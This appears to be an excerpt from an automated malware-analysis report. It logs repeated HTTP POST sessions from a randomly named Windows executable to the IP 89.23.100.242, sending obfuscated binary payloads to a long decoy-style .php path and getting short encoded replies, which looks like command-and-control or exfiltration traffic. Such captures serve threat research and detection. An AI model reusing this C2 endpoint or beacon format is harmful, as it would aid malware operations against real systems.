    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
    Host: 89.23.100.242
    Content-Length: 2544
    Expect: 100-continue
    Connection: Keep-Alive
Jan 10, 2025 07:58:13.392235994 CET | 2544 | OUT | Data Raw: 5c 54 46 55 5e 58 56 5f 58 5b 57 56 50 5e 5b 53 55 5c 5e 58 54 51 51 5e 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
    Data Ascii: \TFU^XV_X[WVP^[SU\^XTQQ^RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$;>.:(5(Y-::($<88[5$</Y*<6%=?3:'_!/Y.=
Jan 10, 2025 07:58:13.794368982 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 10, 2025 07:58:13.946679115 CET | 200 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 10 Jan 2025 06:58:13 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 4=V@[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.2.4 | 49879 | 89.23.100.242 | 80 | 7860 | C:\Windows\ShellExperiences\uAsLgsGzSk.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:58:14.081201077 CET | 531 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
    Host: 89.23.100.242
    Content-Length: 2544
    Expect: 100-continue
    Connection: Keep-Alive
Jan 10, 2025 07:58:14.439058065 CET | 2544 | OUT | Data Raw: 59 50 46 54 5e 5a 53 57 58 5b 57 56 50 58 5b 56 55 54 5e 5f 54 5c 51 5a 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
    Data Ascii: YPFT^ZSWX[WVPX[VUT^_T\QZRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'C/1;[(=<&-)!V<-'+;<Z#4'<?)Y%2;3*'_!/Y.%


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.4 | 49885 | 89.23.100.242 | 80 | 7860 | C:\Windows\ShellExperiences\uAsLgsGzSk.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:58:14.732002020 CET | 531 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
    Host: 89.23.100.242
    Content-Length: 2036
    Expect: 100-continue
    Connection: Keep-Alive
Jan 10, 2025 07:58:15.079663038 CET | 2036 | OUT | Data Raw: 59 55 43 55 5e 5d 56 56 58 5b 57 56 50 5c 5b 56 55 51 5e 52 54 5c 51 5d 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
    Data Ascii: YUCU^]VVX[WVP\[VUQ^RT\Q]RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$/0+<P?/2<X+;8]"'$(,><*A&>$Y'*'_!/Y.
Jan 10, 2025 07:58:15.476474047 CET | 374 | IN | HTTP/1.1 100 Continue
    Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 36 3a 35 38 3a 31 35 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 0d 0a 39 38 0d 0a 0f 1e 39 57 23 38 3f 0f 26 2f 07 11 3a 59 3e 0b 3f 33 3c 12 2a 03 37 5a 29 30 3b 56 2d 01 3b 54 20 28 31 5c 2b 21 22 14 27 2c 24 52 25 1d 21 59 0c 13 25 01 3f 2a 0f 56 29 14 0a 5b 29 22 3d 1c 27 20 2b 1d 24 13 0f 18 23 06 2c 5b 3f 39 21 51 3c 08 32 0f 2c 39 3c 16 29 3c 30 1f 30 1c 2a 57 0c 1f 25 0a 23 21 39 57 21 1c 0b 03 30 2b 23 1e 30 06 24 56 26 11 20 01 20 3a 3c 03 2e 5f 3b 00 35 00 23 01 2a 10 2d 0b 22 1c 2c 52 28 2c 20 51 22 0d 22 50 [TRUNCATED]
    Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Fri, 10 Jan 2025 06:58:15 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-Encoding989W#8?&/:Y>?3<*7Z)0;V-;T (1\+!"',$R%!Y%?*V)[)"=' +$#,[?9!Q<2,9<)<00*W%#!9W!0+#0$V& :<._;5#*-",R(, Q""P0]Q0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                48192.168.2.44988689.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:58:14.849236965 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:58:15.204655886 CET | 2544 | OUT | Data Raw: 59 5f 46 57 5e 57 56 5f 58 5b 57 56 50 5e 5b 57 55 57 5e 5e 54 5a 51 58 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: Y_FW^WV_X[WVP^[WUW^^TZQXRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'D,W;+-1^(,*=+=8+;;64;W( <*<"& 0'_!/Y.=
                                                                                                Jan 10, 2025 07:58:15.611236095 CET | 225 | IN | HTTP/1.1 100 Continue
                                                                                                Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 36 3a 35 38 3a 31 35 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 0d 0a 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Fri, 10 Jan 2025 06:58:15 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-Encoding4=V@[0


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                49 | 192.168.2.4 | 49893 | 89.23.100.242 | 80 | 7860 | C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Jan 10, 2025 07:58:15.738004923 CET | 507 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Jan 10, 2025 07:58:16.095899105 CET | 2544 | OUT | Data Raw: 59 53 43 5e 5e 5a 53 52 58 5b 57 56 50 5a 5b 54 55 50 5e 5f 54 5d 51 5a 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: YSC^^ZSRX[WVPZ[TUP^_T]QZRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'A/1#X+=1^?6Z,9R?[$Y?8 "7$(?[+?)1=&:'_!/Y.-
                                                                                                Jan 10, 2025 07:58:16.493371964 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:58:16.628550053 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:58:16 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                50 | 192.168.2.4 | 49900 | 89.23.100.242 | 80 | 7860 | C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Jan 10, 2025 07:58:16.754162073 CET | 507 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2536
                                                                                                Expect: 100-continue
                                                                                                Jan 10, 2025 07:58:17.111007929 CET | 2536 | OUT | Data Raw: 5c 52 43 57 5e 59 56 5e 58 5b 57 56 50 5b 5b 50 55 51 5e 5d 54 5c 51 52 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: \RCW^YV^X[WVP[[PUQ^]T\QRRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$;!'[?>:?;,:%T?7<+(6'U<7Y+/!&?':'_!/Y.%
                                                                                                Jan 10, 2025 07:58:17.499454021 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:58:17.634829998 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:58:17 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                51 | 192.168.2.4 | 49908 | 89.23.100.242 | 80 | 7860 | C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Jan 10, 2025 07:58:17.940373898 CET | 531 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:58:18.298494101 CET | 2544 | OUT | Data Raw: 59 52 43 54 5e 57 53 52 58 5b 57 56 50 52 5b 52 55 5d 5e 52 54 59 51 52 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: YRCT^WSRX[WVPR[RU]^RTYQRRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'83(9^+57,"<((;(X5P?'=)2+&*'_!/Y.
                                                                                                Jan 10, 2025 07:58:18.682701111 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:58:18.816788912 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:58:18 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                52 | 192.168.2.4 | 49915 | 89.23.100.242 | 80 | 7860 | C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Jan 10, 2025 07:58:18.940762997 CET | 531 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:58:19.298449039 CET | 2544 | OUT | Data Raw: 59 54 43 55 5e 5a 56 50 58 5b 57 56 50 53 5b 57 55 55 5e 59 54 5d 51 58 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: YTCU^ZVPX[WVPS[WUU^YT]QXRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'D,;?>9<&[,:&?+8$67(0)?2[7':'_!/Y.
                                                                                                Jan 10, 2025 07:58:19.712601900 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:58:19.842578888 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:58:19 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                53 | 192.168.2.4 | 49925 | 89.23.100.242 | 80 | 7860 | C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Jan 10, 2025 07:58:20.254432917 CET | 531 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:58:20.610934019 CET | 2544 | OUT | Data Raw: 59 55 43 57 5b 59 53 57 58 5b 57 56 50 5e 5b 5a 55 52 5e 5d 54 50 51 53 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: YUCW[YSWX[WVP^[ZUR^]TPQSRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$/2'+.=^(5'8*?.')8!4+U *>&3'_!/Y.=


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                54 | 192.168.2.4 | 49926 | 89.23.100.242 | 80 | 7860 | C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Jan 10, 2025 07:58:20.510812998 CET | 531 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2036
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:58:20.861207008 CET | 2036 | OUT | Data Raw: 59 51 43 57 5b 5b 56 56 58 5b 57 56 50 5d 5b 51 55 55 5e 5b 54 5a 51 5a 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: YQCW[[VVX[WVP][QUU^[TZQZRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'C8'?=%(/)%(>(]?86'?+##^)?&.7$'_!/Y.1
                                                                                                Jan 10, 2025 07:58:21.384130001 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:58:21.438735962 CET | 349 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:58:21 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 39 38 0d 0a 0f 1e 39 54 34 3b 28 56 25 2c 35 57 3a 06 3e 0a 2b 20 3f 06 2a 03 20 03 3e 20 3f 57 3a 01 2f 1e 35 28 2e 04 2b 1c 3d 0a 26 3c 30 1e 27 37 21 59 0c 13 26 13 3f 04 04 0e 3d 3a 02 13 28 0f 0b 19 30 1d 37 1d 30 3d 3d 16 20 01 30 5a 3f 2a 29 51 2a 31 0c 0c 2d 07 2c 17 28 3c 0e 55 30 36 2a 57 0c 1f 26 52 22 21 39 13 21 21 36 58 27 16 27 10 33 01 3c 57 24 2f 20 05 23 04 27 58 2c 29 05 03 22 2d 2b 02 3e 3d 2d 0e 22 0b 37 09 2b 2c 20 51 22 0d 22 50 02 30 5d 51 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 989T4;(V%,5W:>+ ?* > ?W:/5(.+=&<0'7!Y&?=:(070== 0Z?*)Q*1-,(<U06*W&R"!9!!6X''3<W$/ #'X,)"-+>=-"7+, Q""P0]Q0


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                55 | 192.168.2.4 | 49930 | 89.23.100.242 | 80 | 7860 | C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Jan 10, 2025 07:58:20.786803007 CET | 531 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:58:21.142388105 CET | 2544 | OUT | Data Raw: 5c 51 43 54 5e 5d 56 52 58 5b 57 56 50 58 5b 5b 55 52 5e 5f 54 5a 51 58 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: \QCT^]VRX[WVPX[[UR^_TZQXRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR';/Y?>%[?Z/:*($<4"4;U<=@%8Y3:'_!/Y.%
                                                                                                Jan 10, 2025 07:58:21.607119083 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:58:21.759690046 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:58:21 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                56 | 192.168.2.4 | 49938 | 89.23.100.242 | 80 | 7860 | C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Jan 10, 2025 07:58:21.888396978 CET | 507 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
